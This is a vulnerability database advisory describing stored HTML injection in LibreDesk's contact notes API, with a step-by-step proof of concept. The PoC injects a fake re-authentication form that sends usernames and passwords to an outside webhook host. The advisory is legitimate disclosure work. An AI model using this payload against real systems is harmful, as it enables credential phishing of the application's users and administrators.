Wiz
Vulnerability DatabaseGHSA-wh6m-h6f4-rjf4

GHSA-wh6m-h6f4-rjf4
vulnerability analysis and mitigation

Summary

LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.

Details

When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is. By intercepting the request to:

POST /api/v1/contacts/3/notes

and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it. As a result: * Arbitrary HTML tags (e.g., <form>, <input>, <img>) are stored * The injected HTML is rendered when the notes are viewed in the application * No server-side HTML sanitization or allowlisting is enforced This indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.

PoC

  1. Log in to LibreDesk and open any contact.
  2. Add a note normally via the UI.
  3. Intercept the request to:
    POST /api/v1/contacts/3/notes
  4. Original request body (example):
    {
"note": "<p>This is a normal note</p>"
}
  5. Modify the payload by removing the <p> tag and injecting arbitrary HTML:
    {
"note": "<form action='https://webhook.site/xxxx' method='POST'>
           <input type='text' name='username' placeholder='Username'>
           <input type='password' name='password' placeholder='Password'>
           <input type='submit' value='Re-authenticate'>
         </form>"
}
  6. Forward the request.
  7. View the contact note in the LibreDesk UI.

Result: The injected HTML form is rendered inside the application.

Impact

This is a stored HTML injection vulnerability affecting any user who can add or view contact notes. Potential impact includes:

  • Credential phishing through injected forms
  • CSRF-style forced actions using HTML-only forms
  • UI redress and social engineering
  • Increased risk if notes are viewed by privileged users (e.g., admins or agents)If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.

SourceNVD

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Cloud Vulnerability DB

Cloud Vulnerability DB

A community-led vulnerabilities database

Cloud Threat Landscape

Cloud Threat Landscape

A threat intelligence database

PEACH

PEACH

A tenant isolation framework

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management
Get a demo